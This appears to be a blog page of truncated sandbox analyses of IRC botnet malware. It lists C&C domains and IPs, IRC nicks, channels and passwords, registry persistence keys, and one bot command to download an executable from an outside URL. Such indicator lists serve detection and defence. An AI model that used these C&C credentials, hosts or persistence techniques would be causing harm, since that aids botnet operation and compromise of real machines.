Author: Pig

tes.stuckin.org: type A, class IN, addr 208.53.131.135 tes.memehehz.info: type A, class IN, addr 208.53.131.135 tes.enterhere2.biz: type A, class IN, addr 208.53.131.135 Startup: explorer.exe (PID: 776 MD5: 12896823FB95BFB3DC9B46BCAEDC9923) wscntfy.exe (PID: 676 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5) udp ports: 57134,4444 File Created: C:RECYCLERS-1-5-21-9031247443-7444027205-238249698-8303 C:RECYCLERS-1-5-21-9031247443-7444027205-238249698-8303Desktop.ini Memory written: 3 776 C:WINDOWSexplorer.exe 00980000 success or wait 1 8 776 C:WINDOWSexplorer.exe 00990000 success orRead more...

Resolved : [backup.kazeu.net] To [217.219.137.162] Resolved : [backup.kazeu.net] To [218.206.248.154] Resolved : [backup.kazeu.net] To [178.32.95.119] 178.32.95.119:23232 Nickname​: n[USA​|XPP|x32​|HANS]qe​bjljr User: 6625″” Joins ch​annel: :​#securit​y-check# Joins ch​annel: #​!icee PW​: ERROR Joins channel: :#!icee ..’..K..​’.?…E.​.

Remote Host Port Number 217.23.13.240 6374 NICK n{USA|XP}392156 USER 3921 “” “TsGh” :3921 JOIN #nade2# PONG :irc.NaDe.gov * The following port was open in the system: Port Protocol Process 1053 TCP hidserv.exe (%AppData%hidserv.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%hidserv.exe” so that hidserv.exe runs everyRead more...

Remote Host Port Number omgredrum.no-ip.biz 51987 Resolved : [omgredrum.no-ip.biz] To [69.65.19.117] Resolved : [omgredrum.no-ip.biz] To [69.65.19.116] PASS Virus NICK VirUs-aruhtp USER sntmwl “” “pup” :sntmwl Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122}] + StubPath = “c:RESTORES-1-5-21-1482476501-1644491937-682003330-1013RedruMx.exe” so thatRead more...

Remote Host Port Number 184.73.209.168 80 204.0.5.41 80 204.0.5.58 80 204.0.5.59 80 207.38.101.12 80 208.43.117.134 80 216.178.38.168 80 63.135.80.58 80 63.135.86.25 80 63.135.86.37 80 205.234.236.32 1234 PASS xxx NICK NEW-[USA|00|P|39592] USER XP-5696 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|39592] -ix JOIN #!nn! test PONG 22 MOTD * The data identified by the following URLs was then requestedRead more...

nice.niceshot.in 67.202.108.130 C&C Server: 67.202.108.130:6567 PASS s1m0n3t4 Server Password: Username: XP-1204 Nickname: [SI|DEU|00|P|86096] Channel: #sucksusb# (Password: c1rc0dus0leil) Channeltopic: :.desfi http://iphoneate.in/salario/yem.exe c:WINDOWScap.exe 1 MODE [SI|USA|00|P|97963] -ix JOIN #update# c1rc0dus0leil PRIVMSG #update# :[Dl]: File download: 84.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_64066.exe @ 84.0KB/sec. QUIT [Update]: Updating to new bin. NICK [SI|USA|00|P|61951] USER XP-8990 * 0 :COMPUTERNAME MODE [SI|USA|00|P|61951] -ix JOINRead more...

Remote Host Port Number 74.208.43.209 5000 JOIN ##[ENG] JOIN #msn# PONG :4DFB1F08 NICK [V2][ENG][COMPUTERNAME]9523 PING :redc00de.no-ip.biz 00000000 | 5041 5353 200D 0A55 7365 7220 6B6B 6B20 | PASS ..User kkk 00000010 | 6B6B 6B20 6B6B 6B20 6B6B 6B20 3A6B 6B6B | kkk kkk kkk :kkk Registry Modifications * The newly created Registry Values are: oRead more...

Remote Host Port Number 77.68.56.80 81 addr: oki.nerashti.net ip: 77.68.56.80 addr: oki.nerashti.net ip: 88.208.209.166 Domain from this criminal lamer is hosted in australia and is strange how they allow botnet use from domains registered on :https://www.melbourneit.com.au/ Here infos about australian hosting: Sales Australian callers: 1300 654 677 Other callers: +61 3 8624 2300 Support AustralianRead more...

Remote Host Port Number 184.73.209.168 80 204.0.5.42 80 204.0.5.56 80 204.0.5.58 80 208.43.117.134 80 216.178.38.103 80 216.178.38.168 80 63.135.86.25 80 63.135.86.30 80 64.208.138.218 80 64.202.102.11 1234 PASS xxx NICK NEW-[USA|00|P|54508] USER XP-6046 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|54508] -ix JOIN #!nn! test PONG 22 MOTD * The data identified by the following URLs was then requestedRead more...

Remote Host Port Number 109.196.130.50 57221 112.78.112.208 80 218.85.133.201 80 MODE #! -ix MODE #Ma -ix USER SP2-668 * 0 :COMPUTERNAME MODE [N00_USA_XP_0519458] @ -ix MODE #dpi -ix There was an outbound traffic produced on port 57221: 00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR 00000010 | 5256 4D53 4720Read more...